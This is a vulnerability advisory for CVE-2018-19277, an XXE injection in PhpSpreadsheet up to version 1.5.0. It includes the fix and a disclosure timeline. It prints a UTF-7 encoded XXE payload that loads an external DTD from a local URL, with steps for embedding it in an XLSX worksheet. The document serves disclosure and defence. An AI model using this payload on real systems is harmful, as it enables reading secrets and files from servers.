PhpSpreadsheet Versions<=1.5.0 - XXE injection
by Alex Leahu, on Nov 30, 2018 11:28:00 AM
PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.
One vulnerability was identified within the PhpSpreadsheet library.
Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.
This vulnerability is described in the following section.
XML External Entity (XXE) Injection
The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.
CVE ID: CVE-2018-19277
Access Vector: Network
Security Risk: High
CVSS Base Score: 7.7
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>
The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.
When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.
- 11/12/2018: Initial discovery for version 1.5.0
- 11/20/2018: Security fix implemented in version 1.5.1
Alex Leahu, Senior Security Analyst at Bishop Fox